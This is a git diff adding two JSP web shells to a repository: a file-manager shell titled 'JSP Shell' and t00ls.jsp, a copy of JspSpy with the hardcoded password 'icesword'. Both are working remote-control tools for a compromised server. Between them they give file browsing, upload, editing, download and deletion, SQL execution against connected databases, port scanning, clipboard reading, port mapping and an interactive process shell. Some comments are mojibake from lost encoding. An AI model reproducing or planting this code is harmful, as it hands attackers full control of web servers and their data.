+String getDrivers() +/** +Windowsϵͳȡÿõ߼ +*/ +{ + StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); + File roots[]=File.listRoots(); + for(int i=0;i"); + sb.append(roots[i]+" "); + } + return sb.toString(); +} +static String convertFileSize(long filesize) +{ + //bug 5.09M ʾ5.9M + String strUnit="Bytes"; + String strAfterComma=""; + int intDivisor=1; + if(filesize>=1024*1024) + { + strUnit = "MB"; + intDivisor=1024*1024; + } + else if(filesize>=1024) + { + strUnit = "KB"; + intDivisor=1024; + } + if(intDivisor==1) return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; + if(strAfterComma=="") strAfterComma=".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; +} +%> +<% +request.setCharacterEncoding("gb2312"); +String tabID = request.getParameter("tabID"); +String strDir = request.getParameter("path"); +String strAction = request.getParameter("action"); +String strFile = request.getParameter("file"); +String strPath = strDir + "\\" + strFile; +String strCmd = request.getParameter("cmd"); +StringBuffer sbEdit=new StringBuffer(""); +StringBuffer sbDown=new StringBuffer(""); +StringBuffer sbCopy=new StringBuffer(""); +StringBuffer sbSaveCopy=new StringBuffer(""); +StringBuffer sbNewFile=new StringBuffer(""); + +if((tabID==null) || tabID.equals("")) +{ + tabID = "1"; +} + +if(strDir==null||strDir.length()<1) +{ + strDir = request.getRealPath("/"); +} + + +if(strAction!=null && strAction.equals("down")) +{ + File f=new File(strPath); + if(f.length()==0) + { + sbDown.append("ļСΪ 0 ֽڣͲ˰"); + } + else + { + response.setHeader("content-type","text/html; charset=ISO-8859-1"); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); + FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); + out.clearBuffer(); + int i; + while ((i=fileInputStream.read()) != -1) + { + out.write(i); + } + fileInputStream.close(); + out.close(); + } +} + +if(strAction!=null && strAction.equals("del")) +{ + File f=new File(strPath); + f.delete(); +} + +if(strAction!=null && strAction.equals("edit")) +{ + File f=new File(strPath); + BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); + sbEdit.append("
          \r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  "+strPath+"\r\n"); + sbEdit.append("
          "); + sbEdit.append(""); + sbEdit.append("
          "); +} + +if(strAction!=null && strAction.equals("save")) +{ + File f=new File(strPath); + BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); + String strContent=request.getParameter("content"); + bw.write(strContent); + bw.close(); +} +if(strAction!=null && strAction.equals("copy")) +{ + File f=new File(strPath); + sbCopy.append("
          \r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("ԭʼļ "+strPath+"

          "); + sbCopy.append("Ŀļ

          "); + sbCopy.append(" "); + sbCopy.append("

           \r\n"); + sbCopy.append("

          "); +} +if(strAction!=null && strAction.equals("savecopy")) +{ + File f=new File(strPath); + String strDesFile=request.getParameter("file2"); + if(strDesFile==null || strDesFile.equals("")) + { + sbSaveCopy.append("

          Ŀļ"); + } + else + { + File f_des=new File(strDesFile); + if(f_des.isFile()) + { + sbSaveCopy.append("

          ĿļѴ,ܸơ"); + } + else + { + String strTmpFile=strDesFile; + if(f_des.isDirectory()) + { + if(!strDesFile.endsWith("\\")) + { + strDesFile=strDesFile+"\\"; + } + strTmpFile=strDesFile+"cqq_"+strFile; + } + + File f_des_copy=new File(strTmpFile); + FileInputStream in1=new FileInputStream(f); + FileOutputStream out1=new FileOutputStream(f_des_copy); + byte[] buffer=new byte[1024]; + int c; + while((c=in1.read(buffer))!=-1) + { + out1.write(buffer,0,c); + } + in1.close(); + out1.close(); + + sbSaveCopy.append("ԭʼļ "+strPath+"

          "); + sbSaveCopy.append("Ŀļ "+strTmpFile+"

          "); + sbSaveCopy.append("Ƴɹ"); + } + } + sbSaveCopy.append("

          "); +} +if(strAction!=null && strAction.equals("newFile")) +{ + String strF=request.getParameter("fileName"); + String strType1=request.getParameter("btnNewFile"); + String strType2=request.getParameter("btnNewDir"); + String strType=""; + if(strType1==null) + { + strType="Dir"; + } + else if(strType2==null) + { + strType="File"; + } + if(!strType.equals("") && !(strF==null || strF.equals(""))) + { + File f_new=new File(strF); + if(strType.equals("File") && !f_new.createNewFile()) + sbNewFile.append(strF+" ļʧ"); + if(strType.equals("Dir") && !f_new.mkdirs()) + sbNewFile.append(strF+" Ŀ¼ʧ"); + } + else + { + sbNewFile.append("

          ļĿ¼"); + } +} + +if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) +{ + String tempdir="."; + boolean error=false; + response.setContentType("text/html"); + sbNewFile.append("

          ļĿ¼"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) + { + + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) + { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } + else + { + String path = (String) ht.get("path"); + if(path!=null && !path.endsWith("\\")) + path = path + "\\"; + if (!f1.renameTo(new File(path + f1.getName()))) + { + request.setAttribute("error", "Cannot upload file."); + error = true; + f1.delete(); + } + } + } +} +%> + + + + + + + +JSP Shell רð汾 + + + + + +

          + + + + + + +
          + + + + + + +<% +StringBuffer sbFolder=new StringBuffer(""); +StringBuffer sbFile=new StringBuffer(""); +try +{ + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if(objFile.getAbsolutePath().length()>3) + { + sbFolder.append(" "); + sbFolder.append(strParentFolder[languageNo]+"
          - - - - - - - - - - - \r\n "); + + + } + for(int i=0;i "); + sbFolder.append(" "); + sbFolder.append(list[i].getName()+"
          "); + } + else + { + String strLen=""; + String strDT=""; + long lFile=0; + lFile=list[i].length(); + strLen = convertFileSize(lFile); + Date dt=new Date(list[i].lastModified()); + strDT=dt.toLocaleString(); + sbFile.append(""); + sbFile.append(""+list[i].getName()); + sbFile.append(""); + sbFile.append(""+strLen); + sbFile.append(""); + sbFile.append(""+strDT); + sbFile.append(""); + + sbFile.append("  "); + sbFile.append(strFileEdit[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDel[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDown[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileCopy[languageNo]+" "); + } + + } +} +catch(Exception e) +{ + out.println("ʧܣ "+e.toString()+""); +} +%> + +
          + + + + + + + + + +
          +

          +
          +
          \ No newline at end of file diff --git a/jsp/t00ls.jsp b/jsp/t00ls.jsp new file mode 100644 index 0000000..39b6d88 --- /dev/null +++ b/jsp/t00ls.jsp @@ -0,0 +1,3294 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! + private static final String PW = "icesword"; //password + private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; + private static final String REQUEST_CHARSET = "ISO-8859-1"; + private static final String PAGE_CHARSET = "UTF-8"; + private static final String CURRENT_DIR = "currentdir"; + private static final String MSG = "SHOWMSG"; + private static final String PORT_MAP = "PMSA"; + private static final String DBO = "DBO"; + private static final String SHELL_ONLINE = "SHELL_ONLINE"; + private static final String ENTER = "ENTER_FILE"; + private static final String ENTER_MSG = "ENTER_FILE_MSG"; + private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; + private static final String SESSION_O = "SESSION_O"; + private static String SHELL_NAME = ""; + private static String WEB_ROOT = null; + private static String SHELL_DIR = null; + public static Map ins = new HashMap(); + private static boolean ISLINUX = false; + + private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; + private static final String BACK_HREF = " Back"; + + private static class MyRequest extends HttpServletRequestWrapper { + public MyRequest(HttpServletRequest req) { + super(req); + } + public String getParameter(String name) { + try { + String value = super.getParameter(name); + if (name == null) + return null; + return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); + } catch (Exception e) { + return null; + } + } + } + private static class SpyClassLoader extends ClassLoader{ + public SpyClassLoader() { + } + public Class defineClass(String name,byte[] b) { + return super.defineClass(name,b,0,b.length - 2); + } + } + private static class DBOperator{ + private Connection conn = null; + private Statement stmt = null; + private String driver; + private String url; + private String uid; + private String pwd; + public DBOperator(String driver,String url,String uid,String pwd) throws Exception { + this(driver,url,uid,pwd,false); + } + public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { + Class.forName(driver); + if (connect) + this.conn = DriverManager.getConnection(url,uid,pwd); + this.url = url; + this.driver = driver; + this.uid = uid; + this.pwd = pwd; + } + public void connect() throws Exception{ + this.conn = DriverManager.getConnection(url,uid,pwd); + } + public Object execute(String sql) throws Exception { + if (isValid()) { + stmt = conn.createStatement(); + if (stmt.execute(sql)) { + return stmt.getResultSet(); + } else { + return ""+stmt.getUpdateCount(); + } + } + throw new Exception("Connection is inValid."); + } + public void closeStmt() throws Exception{ + if (this.stmt != null) + stmt.close(); + } + public boolean isValid() throws Exception { + return conn != null && !conn.isClosed(); + } + public void close() throws Exception { + if (isValid()) { + closeStmt(); + conn.close(); + } + } + public boolean equals(Object o) { + if (o instanceof DBOperator) { + DBOperator dbo = (DBOperator)o; + return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); + } + return false; + } + public Connection getConn(){ + return this.conn; + } + } + private static class StreamConnector extends Thread { + private InputStream is; + private OutputStream os; + public StreamConnector( InputStream is, OutputStream os ){ + this.is = is; + this.os = os; + } + public void run(){ + BufferedReader in = null; + BufferedWriter out = null; + try{ + in = new BufferedReader( new InputStreamReader(this.is)); + out = new BufferedWriter( new OutputStreamWriter(this.os)); + char buffer[] = new char[8192]; + int length; + while((length = in.read( buffer, 0, buffer.length ))>0){ + out.write( buffer, 0, length ); + out.flush(); + } + } catch(Exception e){} + try{ + if(in != null) + in.close(); + if(out != null) + out.close(); + } catch( Exception e ){} + } + public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ + new Thread(new Runnable(){ + public void run(){ + while (true) { + try{ + byte[] data = new byte[100]; + int len = localIn.read(data); + while (len != -1) { + remoteOut.write(data,0,len); + len = localIn.read(data); + } + }catch (Exception e) { + break; + } + } + } + }).start(); + } + public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ + new Thread(new Runnable(){ + public void run(){ + while(true) { + try{ + byte[] data = new byte[100]; + int len = remoteIn.read(data); + while (len != -1) { + localOut.write(data,0,len); + len = remoteIn.read(data); + } + }catch (Exception e) { + try{ + soc.close(); + remoteSoc.close(); + }catch(Exception ex) { + } + break; + } + } + } + }).start(); + } + } + private static class EnterFile extends File{ + private ZipFile zf = null; + private ZipEntry entry = null; + private boolean isDirectory = false; + private String absolutePath = null; + public void setEntry(ZipEntry e) { + this.entry = e; + } + public void setAbsolutePath(String p) { + this.absolutePath = p; + } + public void close() throws Exception{ + this.zf.close(); + } + public void setZf(String p) throws Exception{ + if (p.toLowerCase().endsWith(".jar")) + this.zf = new JarFile(p); + else + this.zf = new ZipFile(p); + } + public EnterFile(File parent, String child) { + super(parent,child); + } + public EnterFile(String pathname) { + super(pathname); + } + public EnterFile(String pathname,boolean isDir) { + this(pathname); + this.isDirectory = isDir; + } + public EnterFile(String parent, String child) { + super(parent,child); + } + public EnterFile(URI uri) { + super(uri); + } + public boolean exists(){ + return new File(this.zf.getName()).exists(); + } + public File[] listFiles() { + java.util.List list = new ArrayList(); + java.util.List handled = new ArrayList(); + String currentDir = super.getPath(); + currentDir = currentDir.replace('\\','/'); + if (currentDir.indexOf("/") == 0) + { + if (currentDir.length() > 1) + currentDir = currentDir.substring(1); + else + currentDir = ""; + } + Enumeration e = this.zf.entries(); + while (e.hasMoreElements()) + { + ZipEntry entry = (ZipEntry)e.nextElement(); + String eName = entry.getName(); + if (this.zf instanceof JarFile) { + if (!entry.isDirectory()){ + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + try{ + ef.setZf(this.zf.getName()); + }catch(Exception ex) { + } + list.add(ef); + } + } else { + if (currentDir.equals("")) { + //zip root directory + if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) + { + EnterFile ef = new EnterFile(eName.replaceAll("/","")); + handled.add(eName.replaceAll("/","")); + ef.setEntry(entry); + list.add(ef); + } else { + if (eName.indexOf("/") != -1) { + String tmp = eName.substring(0,eName.indexOf("/")); + if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp,true); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } + } + } else { + if (eName.startsWith(currentDir)) { + if (eName.matches(currentDir+"/[^/]+/?$")) { + //file. + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + list.add(ef); + if (eName.endsWith("/")) { + String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2)); + tmp = tmp.substring(1,tmp.length()-1); + handled.add(tmp); + } + } else { + //dir + try { + String tmp = eName.substring(currentDir.length()+1); + tmp = tmp.substring(0,tmp.indexOf('/')); + if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp,true); + ef.setAbsolutePath(currentDir+"/"+tmp); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } catch (Exception ex) { + } + } + } + } + } + } + return (File[])list.toArray(new File[0]); + } + public boolean isDirectory(){ + return this.entry.isDirectory() || this.isDirectory; + } + public String getParent(){ + return ""; + } + public String getAbsolutePath(){ + return absolutePath != null ? absolutePath : super.getPath(); + } + public String getName(){ + if (this.zf instanceof JarFile) { + return this.getAbsolutePath(); + } else { + return super.getName(); + } + } + public long lastModified(){ + return entry.getTime(); + } + public boolean canRead(){ + return false; + } + public boolean canWrite(){ + return false; + } + public boolean canExecute(){ + return false; + } + public long length(){ + return entry.getSize(); + } + } + private static class OnLineProcess { + private String cmd = "first"; + private Process pro; + public OnLineProcess(Process p){ + this.pro = p; + } + public void setPro(Process p) { + this.pro = p; + } + public void setCmd(String c){ + this.cmd = c; + } + public String getCmd(){ + return this.cmd; + } + public Process getPro(){ + return this.pro; + } + public void stop(){ + this.pro.destroy(); + } + } + private static class OnLineConnector extends Thread { + private OnLineProcess ol = null; + private InputStream is; + private OutputStream os; + private String name; + public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ + this.is = is; + this.os = os; + this.name = name; + this.ol = ol; + } + public void run(){ + BufferedReader in = null; + BufferedWriter out = null; + try{ + in = new BufferedReader( new InputStreamReader(this.is)); + out = new BufferedWriter( new OutputStreamWriter(this.os)); + char buffer[] = new char[128]; + if(this.name.equals("exeRclientO")) { + //from exe to client + int length = 0; + while((length = in.read( buffer, 0, buffer.length ))>0){ + String str = new String(buffer, 0, length); + str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">"); + str = str.replaceAll(""+(char)13+(char)10,"
          "); + str = str.replaceAll("\n","
          "); + out.write(str.toCharArray(), 0, str.length()); + out.flush(); + } + } else { + //from client to exe + while(true) { + while(this.ol.getCmd() == null) { + Thread.sleep(500); + } + if (this.ol.getCmd().equals("first")) { + this.ol.setCmd(null); + continue; + } + this.ol.setCmd(this.ol.getCmd() + (char)10); + char[] arr = this.ol.getCmd().toCharArray(); + out.write(arr,0,arr.length); + out.flush(); + this.ol.setCmd(null); + } + } + } catch(Exception e){ + } + try{ + if(in != null) + in.close(); + if(out != null) + out.close(); + } catch( Exception e ){ + } + } + } + private static class Table{ + private ArrayList rows = null; + private boolean echoTableTag = false; + public void setEchoTableTag(boolean v) { + this.echoTableTag = v; + } + public Table(){ + this.rows = new ArrayList(); + } + public void addRow(Row r) { + this.rows.add(r); + } + public String toString(){ + StringBuffer html = new StringBuffer(); + if (echoTableTag) + html.append(""); + for (int i = 0;i"); + ArrayList columns = r.getColumns(); + for (int a = 0;a"); + String vv = Util.htmlEncode(Util.getStr(c.getValue())); + if (vv.equals("")) + vv = " "; + html.append(vv); + html.append(""); + } + html.append(""); + } + if (echoTableTag) + html.append("
          "); + return html.toString(); + } + public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{ + StringBuffer table = new StringBuffer(); + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + if (!op) + table.append(" View Struct - View All Tables

          "); + else + table.append(" All Tables

          "); + table.append(""); + table.append(""); + for (int i = 1;i<=count;i++) { + table.append(""); + } + if (op) + table.append(""); + table.append(""); + while (rs.next()) { + String tbName = null; + table.append(""); + for (int i = 1;i<=count;i++) { + String v = rs.getString(i); + if (i == 3) + tbName = v; + table.append(""); + } + if (op) + table.append(""); + table.append(""); + } + table.append("
          "+meta.getColumnName(i)+" 
          "+Util.null2Nbsp(v)+" View | Struct | Export | Save To File

          "); + return table.toString(); + } + } + private static class Row{ + private ArrayList cols = null; + public Row(){ + this.cols = new ArrayList(); + } + public void addColumn(Column n) { + this.cols.add(n); + } + public ArrayList getColumns(){ + return this.cols; + } + } + private static class Column{ + private String value; + public Column(String v){ + this.value = v; + } + public String getValue(){ + return this.value; + } + } + private static class Util{ + public static boolean isEmpty(String s) { + return s == null || s.trim().equals(""); + } + public static boolean isEmpty(Object o) { + return o == null || isEmpty(o.toString()); + } + public static String getSize(long size,char danwei) { + if (danwei == 'M') { + double v = formatNumber(size / 1024.0 / 1024.0,2); + if (v > 1024) { + return getSize(size,'G'); + }else { + return v + "M"; + } + } else if (danwei == 'G') { + return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; + } else if (danwei == 'K') { + double v = formatNumber(size / 1024.0,2); + if (v > 1024) { + return getSize(size,'M'); + } else { + return v + "K"; + } + } else if (danwei == 'B') { + if (size > 1024) { + return getSize(size,'K'); + }else { + return size + "B"; + } + } + return ""+0+danwei; + } + public static boolean exists(String[] arr,String v) { + for (int i =0;i",">"); + } + public static String getStr(String s) { + return s == null ? "" :s; + } + public static String null2Nbsp(String s) { + if (s == null) + s = " "; + return s; + } + public static String getStr(Object s) { + return s == null ? "" :s.toString(); + } + public static String exec(String regex, String str, int group) { + Pattern pat = Pattern.compile(regex); + Matcher m = pat.matcher(str); + if (m.find()) + return m.group(group); + return null; + } + public static void outMsg(Writer out,String msg) throws Exception { + outMsg(out,msg,"center"); + } + public static void outMsg(Writer out,String msg,String align) throws Exception { + out.write("
          "+msg+"
          "); + } + public static String highLight(String str) { + str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","$1"); + str = str.replaceAll("\t(//.+)","\t$1"); + return str; + } + } + private static class UploadBean { + private String fileName = null; + private String suffix = null; + private String savePath = ""; + private ServletInputStream sis = null; + private OutputStream targetOutput = null; + private byte[] b = new byte[1024]; + public void setTargetOutput(OutputStream stream) { + this.targetOutput = stream; + } + public UploadBean() { + } + public void setSavePath(String path) { + this.savePath = path; + } + public String getFileName(){ + return this.fileName; + } + public void parseRequest(HttpServletRequest request) throws IOException { + sis = request.getInputStream(); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b,0,b.length))!= -1) { + s = new String(b, 0, a,PAGE_CHARSET); + if ((k = s.indexOf("filename=\""))!= -1) { + s = s.substring(k + 10); + k = s.indexOf("\""); + s = s.substring(0, k); + File tF = new File(s); + if (tF.isAbsolute()) { + fileName = tF.getName(); + } else { + fileName = s; + } + k = s.lastIndexOf("."); + suffix = s.substring(k + 1); + upload(); + } + } + } + private void upload() throws IOException{ + try { + OutputStream out = null; + if (this.targetOutput != null) + out = this.targetOutput; + else + out = new FileOutputStream(new File(savePath,fileName)); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b,0,b.length))!=-1) { + s = new String(b, 0, a); + if ((k = s.indexOf("Content-Type:"))!=-1) { + break; + } + } + sis.readLine(b,0,b.length); + while ((a = sis.readLine(b,0,b.length)) != -1) { + s = new String(b, 0, a); + if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { + break; + } + out.write(b, 0, a); + } + if (out instanceof FileOutputStream) + out.close(); + } catch (IOException ioe) { + throw ioe; + } + } + } +%> +<% + SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); + String myAbsolutePath = application.getRealPath(request.getServletPath()); + if (Util.isEmpty(myAbsolutePath)) {//for weblogic + SHELL_NAME = request.getServletPath(); + myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); + SHELL_NAME=request.getContextPath()+SHELL_NAME; + WEB_ROOT = new File(application.getResource("/").getPath()).toString(); + } else { + WEB_ROOT = application.getRealPath("/"); + } + SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); + if (SHELL_DIR.indexOf('/') == 0) + ISLINUX = true; + else + ISLINUX = false; + if (session.getAttribute(CURRENT_DIR) == null) + session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); + request = new MyRequest(request); + if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { + String o = request.getParameter("o"); + if (o != null && o.equals("login")) { + ((Invoker)ins.get("login")).invoke(request,response,session); + return; + } else if (o != null && o.equals("vLogin")) { + ((Invoker)ins.get("vLogin")).invoke(request,response,session); + return; + } else { + ((Invoker)ins.get("vLogin")).invoke(request,response,session); + return; + } + } +%> +<%! + private static interface Invoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; + public boolean doBefore(); + public boolean doAfter(); + } + private static class DefaultInvoker implements Invoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { + } + public boolean doBefore(){ + return true; + } + public boolean doAfter() { + return true; + } + } + private static class ScriptInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + + } catch (Exception e) { + + throw e ; + } + } + } + private static class BeforeInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("JspSpy Private Codz By - Ninty"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class AfterInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + } catch (Exception e) { + + throw e ; + } + } + } + private static class DeleteBatchInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String files = request.getParameter("files"); + int success = 0; + int failed = 0; + if (!Util.isEmpty(files)) { + String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); + String[] arr = files.split(","); + for (int i = 0;iSuccess , "+failed+" Files Deleted Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ClipBoardInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""+ + " "+ + " "+ + " "+ + "
          "+ + "

          System Clipboard »

          "+ + "

          ");
          +					try{
          +						out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
          +					}catch (Exception ex) {
          +						out.println("ClipBoard is Empty Or Is Not Text Data !");
          +					}
          +					out.println("
          "+ + " "+ + "

          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VPortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + if (Util.isEmpty(ip)) + ip = "127.0.0.1"; + if (Util.isEmpty(ports)) + ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; + if (Util.isEmpty(timeout)) + timeout = "2"; + out.println("
          "+ + "

          PortScan >>

          "+ + "
          "+ + "

          "+ + "IP : Port : Banner Timeout (Second) : "+ + "

          "+ + "
          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class PortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + ((Invoker)ins.get("vPortScan")).invoke(request,response,JSession); + out.println("
          "); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + int iTimeout = 0; + if (Util.isEmpty(ip) || Util.isEmpty(ports)) + return; + if (!Util.isInteger(timeout)) { + timeout = "2"; + } + iTimeout = Integer.parseInt(timeout); + Map rs = new LinkedHashMap(); + String[] portArr = ports.split(","); + for (int i =0;i"+sb.toString()+""); + r.close(); + } else { + rs.put(port,"Open"); + } + s.close(); + } catch (Exception e) { + if (e.toString().toLowerCase().indexOf("read timed out")!=-1) { + rs.put(port,"Open <<No Banner!>>"); + if (r != null) + r.close(); + } else { + rs.put(port,"Close"); + } + } + } + out.println("
          "); + Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry)it.next(); + String port = (String)e.getKey(); + String value = (String)e.getValue(); + out.println(ip+" : "+port+" ................................. "+value+"
          "); + } + out.println("
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VConnInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object obj = JSession.getAttribute(DBO); + if (obj == null || !((DBOperator)obj).isValid()) { + out.println(" "); + out.println("
          "+ + "
          "+ + ""+ + "

          DataBase Manager »

          "+ + ""+ + "

          "+ + "Driver:"+ + " "+ + "URL:"+ + ""+ + "UID:"+ + ""+ + "PWD:"+ + ""+ + "DataBase:"+ + " "+ + ""+ + "

          "+ + "
          "); + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + } + } catch (ClassCastException e) { + throw e; + } catch (Exception e) { + + throw e ; + } + } + } + //DBConnect + private static class DbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String driver = request.getParameter("driver"); + String url = request.getParameter("url"); + String uid = request.getParameter("uid"); + String pwd = request.getParameter("pwd"); + String sql = request.getParameter("sql"); + String selectDb = request.getParameter("selectDb"); + if (selectDb == null) + selectDb = JSession.getAttribute("selectDb").toString(); + else + JSession.setAttribute("selectDb",selectDb); + Object dbo = JSession.getAttribute(DBO); + if (dbo == null || !((DBOperator)dbo).isValid()) { + if (dbo != null) + ((DBOperator)dbo).close(); + dbo = new DBOperator(driver,url,uid,pwd,true); + } else { + if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { + DBOperator oldDbo = (DBOperator)dbo; + dbo = new DBOperator(driver,url,uid,pwd); + if (!oldDbo.equals(dbo)) { + ((DBOperator)oldDbo).close(); + ((DBOperator)dbo).connect(); + } else { + dbo = oldDbo; + } + } + } + DBOperator Ddbo = (DBOperator)dbo; + JSession.setAttribute(DBO,Ddbo); + if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) { + Ddbo.getConn().setCatalog(request.getParameter("catalog")); + } + Util.outMsg(out,"Connect To DataBase Success!"); + out.println(" "); + out.println("
          "+ + "
          "+ + ""+ + "

          DataBase Manager »

          "+ + ""+ + "

          "+ + "Driver:"+ + " "+ + "URL:"+ + ""+ + "UID:"+ + ""+ + "PWD:"+ + ""+ + "DataBase:"+ + " "+ + ""+ + "

          "+ + "
          "); + DatabaseMetaData meta = Ddbo.getConn().getMetaData(); + out.println("
          "+ + "

          Version : "+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"
          URL : "+meta.getURL()+"
          Catalog : "+Ddbo.getConn().getCatalog()+"
          UserName : "+meta.getUserName()+"

          Run SQL query/queries on database / Switch Database : "); + out.println("

